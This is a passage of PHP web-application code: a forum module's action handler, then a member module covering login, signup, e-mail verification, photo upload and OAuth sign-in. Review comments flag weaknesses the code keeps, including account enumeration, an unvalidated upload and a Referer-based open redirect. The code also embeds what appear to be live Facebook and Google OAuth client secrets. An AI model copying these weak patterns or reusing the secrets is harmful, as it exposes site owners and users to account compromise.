$values->forum->vote_exp, 'forum', 'post_' . $values->vote, array('idx' => $values->idx)); $this->IM->getModule('push')->sendPush($values->post->midx, 'forum', 'post_' . 
$values->vote, $values->post->idx, array('from' => $this->IM->getModule('member')->getLogged())); } else { $results->success = false; $results->message = $this->getLanguage('vote/duplicated'); $results->result = $check->result; } } } } if ($action == 'getMent') { $values->parent = Request('parent'); $ments = $this->db()->select($this->table->ment)->where('parent', $values->parent)->get(); for ($i = 0, $loop = count($ments); $i < $loop; $i++) { $member = $this->IM->getModule('member')->getMember($ments[$i]->midx); $ments[$i]->nickname = $member->nickname; $ments[$i]->photo = $member->photo; } $results->success = true; $results->ments = $ments; } if ($action == 'getMentStatus') { $values->parent = Request('parent'); $status = array(); for ($i = 0; $i < 20; $i++) { $status[$i] = array('total' => 0); } $ments = $this->db()->select($this->table->ment)->where('parent', $values->parent)->get(); for ($i = 0, $loop = count($ments); $i < $loop; $i++) { $position = floor($ments[$i]->position / 5); $position = $position == 20 ? 
19 : $position; $status[$position]['total']++; if (isset($status[$position][$ments[$i]->type]) == true) { $status[$position][$ments[$i]->type]++; } else { $status[$position][$ments[$i]->type] = 1; } } $results->success = true; $results->status = $status; } if ($action == 'mentDelete') { $values->idx = Request('idx'); $ment = $this->getMent($values->idx); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_delete') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; $results->modalHtml = $this->getDelete('ment', $values->idx); } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } } if ($action == 'delete') { $values->idx = Request('idx'); $values->type = Request('type'); if ($values->type == 'post') { $post = $this->getPost($values->idx); $values->forum = $this->getLms($post->lid); if ($post == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('post_delete') == true || $post->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { $this->db()->delete($this->table->post)->where('idx', $post->idx)->execute(); $attachments = $this->db()->select($this->table->attachment)->where('parent', $post->idx)->where('type', 'POST')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); $ments = $this->db()->select($this->table->ment)->where('parent', $post->idx)->get(); for ($i = 0, $loop = count($ments); $i < $loop; $i++) { $this->db()->delete($this->table->ment)->where('idx', $ments[$i]->idx)->execute(); 
$this->db()->delete($this->table->ment_depth)->where('idx', $ments[$i]->idx)->execute(); $attachments = $this->db()->select($this->table->attachment)->where('parent', $ments[$i]->idx)->where('type', 'MENT')->get(); for ($j = 0, $loopj = count($attachments); $j < $loopj; $j++) { $attachments[$j] = $attachments[$j]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); } $labels = $this->db()->select($this->table->class_label)->where('idx', $post->idx)->get(); for ($i = 0, $loop = count($labels); $i < $loop; $i++) { $this->db()->delete($this->table->class_label)->where('idx', $values->idx)->where('label', $labels[$i]->label)->execute(); $lastPost = $this->db()->select($this->table->class_label)->where('label', $labels[$i]->label)->orderBy('reg_date', 'desc')->get(); $postnum = count($lastPost); $lastPostTime = $postnum > 0 ? $lastPost[0]->reg_date : 0; $this->db()->update($this->table->label, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $labels[$i]->label)->execute(); } $this->IM->getModule('member')->sendPoint($post->midx, $values->forum->ment_point * -1, 'forum', 'post_delete', array('title' => $post->title), true); if ($post->midx == $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('member')->addActivity($post->midx, 0, 'forum', 'post_delete', array('title' => $post->title)); } else { $this->IM->getModule('push')->sendPush($post->midx, 'forum', 'post_delete', $values->idx, array('title' => $post->title)); } $this->IM->deleteArticle('forum', 'post', $values->idx); } } elseif ($values->type == 'ment') { $ment = $this->getMent($values->idx); $post = $this->getPost($ment->parent); $values->forum = $this->getLms($post->lid); if ($ment == null) { $results->success = false; $results->message = $this->getLanguage('error/notFound'); } elseif ($this->checkPermission('ment_delete') == true || $ment->midx == $this->IM->getModule('member')->getLogged()) { $results->success = true; } else { $results->success = 
false; $results->message = $this->getLanguage('error/forbidden'); } if ($results->success == true) { if ($this->checkMentTree($values->idx) == false) { $this->db()->delete($this->table->ment)->where('idx', $values->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $values->idx)->execute(); if ($ment->source != 0) { $source = $this->getMent($ment->source); while ($source->is_delete == 'TRUE') { if ($this->checkMentTree($source->idx) == false) { $this->db()->delete($this->table->ment)->where('idx', $source->idx)->execute(); $this->db()->delete($this->table->ment_depth)->where('idx', $source->idx)->execute(); if ($source->source != 0) { $source = $this->getMent($source->source); } else { break; } } else { break; } } } $results->position = null; } else { $results->position = $values->idx; $this->db()->update($this->table->ment, array('is_delete' => 'TRUE', 'modify_date' => time(), 'content' => '', 'search' => ''))->where('idx', $ment->idx)->execute(); } $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get(); for ($i = 0, $loop = count($attachments); $i < $loop; $i++) { $attachments[$i] = $attachments[$i]->idx; } $this->IM->getModule('attachment')->fileDelete($attachments); $lastMent = $this->db()->select($this->table->ment)->where('parent', $ment->parent)->where('is_delete', 'FALSE')->orderBy('reg_date', 'desc')->get(); if (count($lastMent) == 0) { $this->db()->update($this->table->post, array('ment' => 0, 'last_ment' => $post->reg_date))->where('idx', $ment->parent)->execute(); $results->parent = $ment->parent; } else { if ($results->position == null) { $position = $this->db()->select($this->table->ment_depth)->where('parent', $ment->parent)->where('head', $ment->head, '<=')->where('arrange', $ment->arrange, '<')->orderBy('head', 'asc')->orderBy('arrange', 'asc')->get(); $lastPosition = array_pop($position); $results->position = $lastPosition->idx; } 
$this->db()->update($this->table->post, array('ment' => count($lastMent), 'last_ment' => $lastMent[0]->reg_date))->where('idx', $ment->parent)->execute(); } $results->message = $this->getLanguage('mentDelete/success'); $this->IM->getModule('member')->sendPoint($ment->midx, $values->forum->ment_point * -1, 'forum', 'ment_delete', array('title' => $post->title), true); if ($ment->midx == $this->IM->getModule('member')->getLogged()) { $this->IM->getModule('member')->addActivity($ment->midx, 0, 'forum', 'ment_delete', array('title' => $post->title)); } else { $this->IM->getModule('push')->sendPush($ment->midx, 'forum', 'ment_delete', $values->idx, array('title' => $post->title)); } $this->IM->deleteArticle('forum', 'ment', $values->idx); } } $results->type = $values->type; } $this->IM->fireEvent('afterDoProcess', 'forum', $action, $values, $results); return $results; }
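/**
 * Runs one member-module action and returns its result object.
 *
 * Request values are read through Request(); the result is a stdClass whose
 * `success` flag (plus `message`, `errors`, `redirect`, ... depending on the
 * action) is filled in by the matching branch. The OAuth actions may send a
 * `location:` header and exit instead of returning.
 *
 * Changes against the previous revision:
 *  - `getLangauge()` typo fixed in the 'modify' and 'password' actions (the
 *    not-logged path called a method name used nowhere else in this file).
 *  - 'sendVerifyEmail' no longer dereferences a missing e-mail record before
 *    testing it for null.
 *  - 'verifyEmail' / 'modifyEmail' compare the verification code as an exact,
 *    non-empty string instead of with loose `==` / `!=`.
 *  - 'modifyEmail' (confirm) and 'modify' (verify step) now require a logged-in
 *    member, like the sibling branches.
 *  - 'forceLogin' checks the decoded payload's shape before using it.
 *
 * @param string $action action name, compared against the literals below
 * @return stdClass result object; also passed to the 'afterDoProcess' event
 */
function doProcess($action) {
    $results = new stdClass();
    $values = new stdClass();

    // Field validation probe used by the signup / profile forms.
    // NOTE(review): the email and nickname probes reveal whether a value is
    // already registered and nothing here limits how often they are called.
    if ($action == 'check') {
        $name = Request('name');
        $value = Request('value');

        if ($name == 'email') {
            if (CheckEmail($value) == true) {
                if ($this->db()->select($this->table->member)->where('email', $value)->has() == true) {
                    $results->success = false;
                    $results->message = $this->getLanguage('signup/help/email/duplicated');
                } else {
                    $results->success = true;
                }
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('signup/help/email/error');
            }
        }

        if ($name == 'name') {
            if (strlen($value) > 0) {
                $results->success = true;
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('signup/help/name/error');
            }
        }

        if ($name == 'nickname') {
            if (CheckNickname($value) == true) {
                // The logged-in member's own row is excluded from the duplicate test.
                if ($this->db()->select($this->table->member)->where('nickname', $value)->where('idx', $this->getLogged(), '!=')->has() == true) {
                    $results->success = false;
                    $results->message = $this->getLanguage('signup/help/nickname/duplicated');
                } else {
                    $results->success = true;
                }
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('signup/help/nickname/error');
            }
        }

        if ($name == 'old_password') {
            if ($this->isLogged() == false) {
                $results->success = false;
                $results->message = $this->getLanguage('error/notLogged');
            } else {
                $mHash = new Hash();
                if ($mHash->password_validate($value, $this->getMember()->password) == true) {
                    $results->success = true;
                    $results->message = $this->getLanguage('password/help/old_password/success');
                } else {
                    $results->success = false;
                    $results->message = $this->getLanguage('password/help/old_password/error');
                }
            }
        }
    }

    // Logs a member in from an encoded token bound to the caller's IP.
    // NOTE(review): this is only as strong as Encoder()/Decoder(); confirm the
    // encoding is authenticated with a server-only key and that tokens expire,
    // since nothing in this branch checks age or single use.
    if ($action == 'forceLogin') {
        $code = Decoder(Request('code'));
        if ($code === false) {
            $results->success = false;
            $results->message = $this->getLanguage('error/invalidCode');
        } else {
            $data = json_decode($code);
            // Require the expected object shape and an exact string match on the IP.
            if (is_object($data) == true && isset($data->ip, $data->idx) == true && $data->ip === $_SERVER['REMOTE_ADDR']) {
                $this->login($data->idx);
                $results->success = true;
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('error/invalidCode');
            }
        }
    }

    // Password login with a session-based failure counter.
    // NOTE(review): the counter lives in the caller's session, so a client that
    // discards its session cookie starts again at zero; confirm a server-side
    // throttle (per account / per address) exists elsewhere.
    // NOTE(review): unknown e-mail and wrong password return different error
    // keys, which tells a caller which addresses are registered.
    // NOTE(review): login() is not visible here; confirm it regenerates the
    // session id.
    if ($action == 'login') {
        $mHash = new Hash();
        $email = Request('email');
        $password = Request('password');
        $results->errors = array();

        $loginFail = (Request('loginFail', 'session') != null && is_array(Request('loginFail', 'session')) == true)
            ? Request('loginFail', 'session')
            : array('count' => 0, 'time' => 0);

        if ($loginFail['time'] > time()) {
            // Still inside the lock-out window set below.
            $results->success = false;
            $results->message = $this->getLanguage('login/error/login');
        } else {
            $check = $this->db()->select($this->table->member)->where('email', $email)->getOne();
            if ($check == null) {
                $results->success = false;
                $results->errors['email'] = $this->getLanguage('login/error/email');
                $loginFail['count']++;
                if ($loginFail['count'] == 5) {
                    // Fifth failure: reset the counter and lock for five hours.
                    $loginFail['count'] = 0;
                    $loginFail['time'] = time() + 60 * 60 * 5;
                }
                $values->email = $email;
                // NOTE(review): the submitted password is handed in clear text
                // to every 'afterDoProcess' listener through $values.
                $values->password = $password;
            } elseif ($mHash->password_validate($password, $check->password) == false) {
                $results->success = false;
                $results->errors['password'] = $this->getLanguage('login/error/password');
                $loginFail['count']++;
                if ($loginFail['count'] == 5) {
                    $loginFail['count'] = 0;
                    $loginFail['time'] = time() + 60 * 60 * 5;
                }
                $values->email = $email;
                $values->password = $password;
            } else {
                if ($check->status == 'ACTIVE') {
                    $this->db()->update($this->table->member, array('last_login' => time()))->where('idx', $check->idx)->execute();
                    $this->login($check->idx);
                    $results->success = true;
                } elseif ($check->status == 'VERIFYING') {
                    // Unverified account: send the caller to the verify step.
                    $_SESSION['MEMBER_REGISTER_IDX'] = Encoder($check->idx);
                    $page = $this->getMemberPage('signup');
                    $results->success = false;
                    $results->redirect = $this->IM->getUrl($page->menu, $page->page, 'verify');
                } else {
                    $results->success = false;
                    $results->message = $this->getLanguage('error/' . $check->status);
                }
            }
        }

        $_SESSION['loginFail'] = $loginFail;
    }

    if ($action == 'logout') {
        unset($_SESSION['MEMBER_LOGGED']);
        $results->success = true;
    }

    if ($action == 'cert') {
        $results->success = true;
    }

    // Creates a member row in VERIFYING state and sends the verification mail.
    // NOTE(review): the only password rule enforced here is a minimum length of
    // four characters.
    if ($action == 'signup') {
        $errors = array();

        // On a failed check each variable receives the error text (the value of
        // the assignment expression), not the submitted value.
        $email = CheckEmail(Request('email')) == true ? Request('email') : ($errors['email'] = $this->getLanguage('signup/help/email/error'));
        $password = strlen(Request('password')) >= 4 ? Request('password') : ($errors['password'] = $this->getLanguage('signup/help/password/error'));
        if (strlen(Request('password')) < 4 || Request('password') != Request('password_confirm')) {
            $errors['password_confirm'] = $this->getLanguage('signup/help/password_confirm/error');
        }
        $name = CheckNickname(Request('name')) == true ? Request('name') : ($errors['name'] = $this->getLanguage('signup/help/name/error'));
        $nickname = CheckNickname(Request('nickname')) == true ? Request('nickname') : ($errors['nickname'] = $this->getLanguage('signup/help/nickname/error'));

        if ($this->db()->select($this->table->member)->where('email', $email)->has() == true) {
            $errors['email'] = $this->getLanguage('signup/help/email/duplicated');
        }
        if ($this->db()->select($this->table->member)->where('nickname', $nickname)->has() == true) {
            $errors['nickname'] = $this->getLanguage('signup/help/nickname/duplicated');
        }

        if (empty($errors) == true) {
            $mHash = new Hash();

            $insert = array();
            $insert['gidx'] = Request('registerGIDX', 'session');
            $insert['email'] = $email;
            $insert['password'] = $mHash->password_hash($password);
            $insert['name'] = $name;
            $insert['nickname'] = $nickname;
            $insert['status'] = 'VERIFYING';

            $idx = $this->db()->insert($this->table->member, $insert)->execute();
            if ($idx !== false) {
                $results->success = true;
                $_SESSION['MEMBER_REGISTER_IDX'] = Encoder($idx);
                $this->sendVerifyEmail($idx);
                unset($_SESSION['registerGIDX']);
            } else {
                $results->success = false;
            }
        } else {
            $results->success = false;
            $results->errors = $errors;
        }
    }

    // Confirms a mailed verification code and activates the member.
    // NOTE(review): registerIDX comes straight from the request and is used as
    // the member idx; attempts are not counted here, and the member row is set
    // to ACTIVE without checking its current status. Confirm both are handled
    // elsewhere (code length/expiry, status == VERIFYING).
    if ($action == 'verifyEmail') {
        $registerIDX = Request('registerIDX');
        if ($registerIDX == null) {
            $results->success = false;
        } else {
            $email = Request('email');
            $email_verify_code = Request('email_verify_code');
            $check = $this->db()->select($this->table->email)->where('midx', $registerIDX)->where('email', $email)->getOne();

            // Exact, non-empty string match: loose `==` treats numeric-looking
            // strings such as '1e1' and '10' as equal and lets an empty code
            // match an empty stored value. hash_equals() is the constant-time
            // option where the runtime provides it.
            $codeMatches = $check != null
                && is_scalar($email_verify_code) == true
                && (string) $email_verify_code !== ''
                && (string) $check->code === (string) $email_verify_code;

            if ($check == null) {
                $results->success = false;
                $results->errors = array('email' => $this->getLanguage('verifyEmail/help/email/notFound'));
            } elseif ($codeMatches == true) {
                $this->db()->update($this->table->email, array('status' => 'VERIFIED'))->where('midx', $registerIDX)->where('email', $email)->execute();
                $this->db()->update($this->table->member, array('status' => 'ACTIVE'))->where('idx', $registerIDX)->execute();
                $results->success = true;
            } else {
                $results->success = false;
                $results->errors = array('email_verify_code' => $this->getLanguage('verifyEmail/help/email_verify_code/error'));
            }
        }
    }

    // (Re)sends a verification mail, for a logged-in member changing address or
    // for a member still in VERIFYING state identified by registerIDX.
    if ($action == 'sendVerifyEmail') {
        $registerIDX = Request('registerIDX');
        $email = Request('email');

        if ($this->isLogged() == true) {
            if (CheckEmail($email) == false) {
                $results->success = false;
                $results->errors = array('email' => $this->getLanguage('modifyEmail/help/email/error'));
            } elseif ($this->db()->select($this->table->member)->where('email', $email)->count() == 1) {
                $results->success = false;
                $results->errors = array('email' => $this->getLanguage('modifyEmail/help/email/duplicated'));
            } else {
                $check = $this->db()->select($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->getOne();
                // A pending mail may be replaced once it is older than 300 seconds.
                if ($check == null || $check->status != 'SENDING' || ($check->status == 'SENDING' && $check->reg_date + 300 < time())) {
                    $this->db()->delete($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->execute();
                    $this->sendVerifyEmail($this->getLogged(), $email);
                    $results->success = true;
                    $results->message = $this->getLanguage('verifyEmail/sending');
                } else {
                    $results->success = false;
                    $results->message = $this->getLanguage('verifyEmail/error/sending');
                }
            }
        } elseif ($registerIDX != null) {
            $member = $this->db()->select($this->table->member)->where('idx', $registerIDX)->getOne();
            if ($member == null || $member->status != 'VERIFYING') {
                $results->success = false;
                $results->message = $this->getLanguage('verifyEmail/error/target');
            } else {
                if (CheckEmail($email) == false) {
                    $results->success = false;
                    $results->message = $this->getLanguage('verifyEmail/error/email');
                } else {
                    $check = $this->db()->select($this->table->email)->where('midx', $registerIDX)->where('email', $email)->getOne();
                    // Test for a missing record first; the previous order read
                    // ->status from a null result.
                    if ($check != null && $check->status == 'VERIFIED') {
                        $signupPage = $this->getMemberPage('signup');
                        $results->success = true;
                        $this->db()->update($this->table->member, array('status' => 'ACTIVE'))->where('idx', $registerIDX)->execute();
                        $results->redirect = $this->IM->getUrl($signupPage->menu, $signupPage->page, 'complete');
                    } elseif ($check == null || $check->status == 'CANCELED' || ($check->status == 'SENDING' && $check->reg_date + 300 < time())) {
                        $this->db()->delete($this->table->email)->where('midx', $registerIDX)->where('email', $email)->execute();
                        $this->sendVerifyEmail($registerIDX, $email);
                        $results->success = true;
                        $results->message = $this->getLanguage('verifyEmail/sending');
                    } else {
                        $results->success = false;
                        $results->message = $this->getLanguage('verifyEmail/error/sending');
                    }
                }
            }
        } else {
            $results->success = false;
            $results->message = $this->getLanguage('error/notLogged');
        }
    }

    if ($action == 'photoEdit') {
        $templet = Request('templet');
        if ($this->isLogged() == true) {
            $results->success = true;
            $results->modalHtml = $this->getPhotoEdit($templet);
            $results->photo = $this->getMember()->photo;
        } else {
            $results->success = false;
            $results->message = $this->getLanguage('error/notLogged');
        }
    }

    // Stores a profile photo posted as a base64 data URL.
    // NOTE(review): the decoded bytes are written to disk before anything
    // checks that they are an image, the declared subtype in $match[1] is
    // ignored, no size limit is applied and the file_put_contents() result is
    // not tested. Validate the payload (for example getimagesizefromstring())
    // and cap its length before writing. The target name is built from the
    // logged-in member idx, not from request data.
    if ($action == 'photoUpload') {
        $photo = Request('photo');
        if ($this->isLogged() == false) {
            $results->success = false;
            $results->message = $this->getLanguage('error/notLogged');
        } else {
            if (preg_match('/^data:image\\/(.*?);base64,(.*?)$/', $photo, $match) == true) {
                $bytes = base64_decode($match[2]);
                $photoPath = $this->IM->getAttachmentPath() . '/member/' . $this->getLogged() . '.jpg';
                file_put_contents($photoPath, $bytes);
                // Source and destination are the same file.
                $this->IM->getModule('attachment')->createThumbnail($photoPath, $photoPath, 250, 250, false, 'jpg');
                $results->success = true;
                $results->message = $this->getLanguage('photoEdit/success');
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('photoEdit/error');
            }
        }
    }

    // Shows the change-e-mail dialog, or (confirm == 'TRUE') applies the change
    // after the mailed code is confirmed.
    if ($action == 'modifyEmail') {
        $confirm = Request('confirm');
        if ($this->isLogged() == false) {
            // The confirm path previously ran its queries with whatever
            // getLogged() returns for an anonymous caller.
            $results->success = false;
            $results->message = $this->getLanguage('error/notLogged');
        } elseif ($confirm == 'TRUE') {
            $email = Request('email');
            $code = Request('code');
            $check = $this->db()->select($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->getOne();

            // Same exact, non-empty comparison as in 'verifyEmail'.
            if ($check == null || is_scalar($code) == false || (string) $code === '' || (string) $check->code !== (string) $code) {
                $results->success = false;
                $results->errors = array('code' => $this->getLanguage('modifyEmail/help/code/error'));
            } else {
                $this->db()->update($this->table->email, array('status' => 'VERIFIED'))->where('midx', $this->getLogged())->where('email', $email)->execute();
                $this->db()->update($this->table->member, array('email' => $email))->where('idx', $this->getLogged())->execute();
                $results->success = true;
                $results->message = $this->getLanguage('modifyEmail/success');
            }
        } else {
            $templet = Request('templet');
            $results->success = true;
            $results->modalHtml = $this->getModifyEmail($templet);
        }
    }

    // Profile change in two steps: 'verify' re-checks the password, 'modify'
    // writes name and nickname.
    // NOTE(review): nothing in the 'modify' step checks that 'verify' succeeded
    // first; confirm whether that is enforced elsewhere.
    if ($action == 'modify') {
        $step = Request('step');

        if ($step == 'verify') {
            if ($this->isLogged() == false) {
                $results->success = false;
                $results->message = $this->getLanguage('error/notLogged');
            } else {
                $member = $this->getMember();
                $password = Request('password');
                $mHash = new Hash();
                if ($mHash->password_validate($password, $member->password) == true) {
                    $results->success = true;
                    // NOTE(review): the submitted password goes back to the
                    // client in Encoder() form; if that encoding is reversible
                    // this exposes the password in the response — confirm.
                    $results->password = Encoder($password);
                } else {
                    $results->success = false;
                    $results->errors = array('password' => $this->getLanguage('verify/help/password/error'));
                }
            }
        }

        if ($step == 'modify') {
            $errors = array();
            $values->name = Request('name') ? Request('name') : ($errors['name'] = $this->getLanguage('signup/help/name/error'));
            $values->nickname = Request('nickname') ? Request('nickname') : ($errors['nickname'] = $this->getLanguage('signup/help/nickname/error'));

            if ($this->isLogged() == false) {
                $results->success = false;
                $results->message = $this->getLanguage('error/notLogged');
            } elseif (count($errors) == 0) {
                $insert = array();
                $insert['name'] = $values->name;
                $insert['nickname'] = $values->nickname;
                $this->db()->update($this->table->member, $insert)->where('idx', $this->getLogged())->execute();
                $results->success = true;
                $results->message = $this->getLanguage('modify/success');
            } else {
                $results->success = false;
                $results->errors = $errors;
            }
        }
    }

    // Password change for the logged-in member.
    if ($action == 'password') {
        $errors = array();
        $password = strlen(Request('password')) >= 4 ? Request('password') : ($errors['password'] = $this->getLanguage('signup/help/password/error'));
        if (strlen(Request('password')) < 4 || Request('password') != Request('password_confirm')) {
            $errors['password_confirm'] = $this->getLanguage('signup/help/password_confirm/error');
        }

        if ($this->isLogged() == false) {
            $results->success = false;
            $results->message = $this->getLanguage('error/notLogged');
        } else {
            $mHash = new Hash();
            // The old password is only demanded when the stored value is 65
            // characters long.
            // NOTE(review): presumably that length marks a hash produced by
            // Hash::password_hash(); any other stored value lets the session
            // holder set a new password without knowing the old one — confirm.
            if (strlen($this->getMember()->password) == 65) {
                $old_password = Request('old_password');
                if ($old_password == '' || $mHash->password_validate($old_password, $this->getMember()->password) == false) {
                    $errors['old_password'] = $this->getLanguage('password/help/old_password/error');
                }
            }

            if (count($errors) == 0) {
                $password = $mHash->password_hash($password);
                $this->db()->update($this->table->member, array('password' => $password))->where('idx', $this->getLogged())->execute();
                $results->success = true;
                $results->message = $this->getLanguage('password/success');
            } else {
                $results->success = false;
                $results->errors = $errors;
            }
        }
    }

    // ---- OAuth sign-in actions -------------------------------------------
    // NOTE(review), applies to all four provider branches below:
    //  - The client secrets are hard-coded. Anything committed to source should
    //    be treated as exposed: rotate them at the provider and load them from
    //    configuration kept outside the repository.
    //  - The post-login redirect target is taken from the Referer header, which
    //    the requester controls and which may be absent; validate it against
    //    this site's own host before it is used in a location header.
    //  - No `state` value is checked in this method before authenticate();
    //    confirm OAuthClient does that.
    //  - Execution continues after printError() unless that method exits.

    if ($action == 'facebook') {
        if (Request('SOCIAL_REDIRECT_URL', 'session') == null) {
            $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER'];
        }

        if ($this->IM->domain == 'www.arzz.com') {
            $CLIENT_ID = '985851538105124';
            $CLIENT_SECRET = 'c6b74ae32d4786b440bb878c46ee2998';
        } elseif ($this->IM->domain == 'www.minitalk.kr') {
            $CLIENT_ID = '418845248317025';
            $CLIENT_SECRET = '5850c198f8f4b0b254a53ae7f9049600';
        } else {
            $CLIENT_ID = '985851538105124';
            $CLIENT_SECRET = 'c6b74ae32d4786b440bb878c46ee2998';
        }

        $AUTH_URL = 'https://graph.facebook.com/oauth/authorize';
        $TOKEN_URL = 'https://graph.facebook.com/oauth/access_token';

        $facebook = new OAuthClient();
        $facebook->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('public_profile,email')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL);

        if (isset($_GET['code']) == true) {
            // Callback leg: exchange the code, then bounce to the client's redirect URL.
            if ($facebook->authenticate($_GET['code']) == true) {
                $redirectUrl = $facebook->getRedirectUrl();
                header('location:' . $redirectUrl);
            }
            exit;
        } elseif ($facebook->getAccessToken() == null) {
            // No token yet: start the authorization leg.
            $authUrl = $facebook->getAuthenticationUrl();
            header('location:' . $authUrl);
            exit;
        }

        $data = $facebook->get('https://graph.facebook.com/me', array('fields' => 'id,email,name'));
        if ($data === false || empty($data->email) == true) {
            $this->IM->printError('API ERROR');
        }

        $accessToken = $facebook->getAccessToken();
        $refreshToken = $facebook->getRefreshToken() == null ? '' : $facebook->getRefreshToken();

        $this->socialLogin('facebook', $data->id, $data->name, $data->email, 'https://graph.facebook.com/' . $data->id . '/picture?width=250&height=250', $accessToken, $refreshToken);
    }

    if ($action == 'google') {
        if (Request('SOCIAL_REDIRECT_URL', 'session') == null) {
            $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER'];
        }

        if ($this->IM->domain == 'www.arzz.com') {
            $CLIENT_ID = '367657130146-m9ojilvf3kbsv6j24uieartls0ols8t8.apps.googleusercontent.com';
            $CLIENT_SECRET = 'GVgWL29VdBiSQIuRTlL5RZDc';
        } elseif ($this->IM->domain == 'www.minitalk.kr') {
            $CLIENT_ID = '476101389490-mug55vcsit7af2sd095m3c8fhd3agssu.apps.googleusercontent.com';
            $CLIENT_SECRET = 'CJKMFEkaWkiasXWIj42WY4HU';
        } else {
            $CLIENT_ID = '995059916144-2odfvfoh0h18fhfsid1lh25d1vpunm5n.apps.googleusercontent.com';
            $CLIENT_SECRET = 'A3G-GgF_2rsWXUuvmU1hPLOv';
        }

        $AUTH_URL = 'https://accounts.google.com/o/oauth2/auth';
        $TOKEN_URL = 'https://accounts.google.com/o/oauth2/token';

        $google = new OAuthClient();
        $google->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('https://www.googleapis.com/auth/plus.me https://www.googleapis.com/auth/userinfo.email')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL);

        if (isset($_GET['code']) == true) {
            if ($google->authenticate($_GET['code']) == true) {
                $redirectUrl = $google->getRedirectUrl();
                header('location:' . $redirectUrl);
            }
            exit;
        } elseif ($google->getAccessToken() == null) {
            $authUrl = $google->getAuthenticationUrl();
            header('location:' . $authUrl);
            exit;
        }

        $data = $google->get('https://www.googleapis.com/plus/v1/people/me');
        if ($data === false || empty($data->emails) == true) {
            $this->IM->printError('API ERROR');
        }

        // Use the first address the provider marks as type 'account'.
        for ($i = 0, $loop = count($data->emails); $i < $loop; $i++) {
            if ($data->emails[$i]->type == 'account') {
                $data->email = $data->emails[$i]->value;
                break;
            }
        }
        $data->photo = str_replace('sz=50', 'sz=250', $data->image->url);

        $accessToken = $google->getAccessToken();
        $refreshToken = $google->getRefreshToken() == null ? '' : $google->getRefreshToken();

        $this->socialLogin('google', $data->id, $data->displayName, $data->email, $data->photo, $accessToken, $refreshToken);
    }

    // Links a YouTube account to the logged-in member and stores its tokens.
    // NOTE(review): access and refresh tokens are written to the social table
    // as returned; confirm how that table is protected at rest.
    if ($action == 'youtube') {
        if (Request('SOCIAL_REDIRECT_URL', 'session') == null) {
            $_SESSION['SOCIAL_REDIRECT_URL'] = $_SERVER['HTTP_REFERER'];
        }

        if ($this->isLogged() == false) {
            die($this->getError('NOT_LOGGED'));
        }

        $CLIENT_ID = '995059916144-2odfvfoh0h18fhfsid1lh25d1vpunm5n.apps.googleusercontent.com';
        $CLIENT_SECRET = 'A3G-GgF_2rsWXUuvmU1hPLOv';
        $AUTH_URL = 'https://accounts.google.com/o/oauth2/auth';
        $TOKEN_URL = 'https://accounts.google.com/o/oauth2/token';

        $youtube = new OAuthClient();
        $youtube->setClientId($CLIENT_ID)->setClientSecret($CLIENT_SECRET)->setScope('https://www.googleapis.com/auth/plus.me https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/youtube https://www.googleapis.com/auth/youtube.upload https://www.googleapis.com/auth/youtubepartner https://www.googleapis.com/auth/youtube.force-ssl')->setAccessType('offline')->setAuthUrl($AUTH_URL)->setTokenUrl($TOKEN_URL);

        if (isset($_GET['code']) == true) {
            if ($youtube->authenticate($_GET['code']) == true) {
                $redirectUrl = $youtube->getRedirectUrl();
                header('location:' . $redirectUrl);
            }
            exit;
        } elseif ($youtube->getAccessToken() == null) {
            $authUrl = $youtube->getAuthenticationUrl();
            header('location:' . $authUrl);
            exit;
        }

        $data = $youtube->get('https://www.googleapis.com/plus/v1/people/me');
        if ($data === false || empty($data->emails) == true) {
            $this->IM->printError('API ERROR');
        }

        for ($i = 0, $loop = count($data->emails); $i < $loop; $i++) {
            if ($data->emails[$i]->type == 'account') {
                $data->email = $data->emails[$i]->value;
                break;
            }
        }

        $accessToken = $youtube->getAccessToken();
        $refreshToken = $youtube->getRefreshToken() == null ? '' : $youtube->getRefreshToken();

        // One 'youtube' row per member: insert the first time, update afterwards.
        $check = $this->db()->select($this->table->social)->where('midx', $this->getLogged())->where('code', 'youtube')->getOne();
        if ($check == null) {
            $this->db()->insert($this->table->social, array('midx' => $this->getLogged(), 'code' => 'youtube', 'user_id' => $data->id, 'email' => $data->email, 'access_token' => $accessToken, 'refresh_token' => $refreshToken))->execute();
        } else {
            $this->db()->update($this->table->social, array('user_id' => $data->id, 'email' => $data->email, 'access_token' => $accessToken, 'refresh_token' => $refreshToken))->where('midx', $this->getLogged())->where('code', 'youtube')->execute();
        }

        unset($_SESSION['OAUTH_ACCESS_TOKEN']);
        unset($_SESSION['OAUTH_REFRESH_TOKEN']);

        // The target stored from the Referer header above is used unvalidated.
        $redirectUrl = Request('SOCIAL_REDIRECT_URL', 'session') != null ? Request('SOCIAL_REDIRECT_URL', 'session') : '/';
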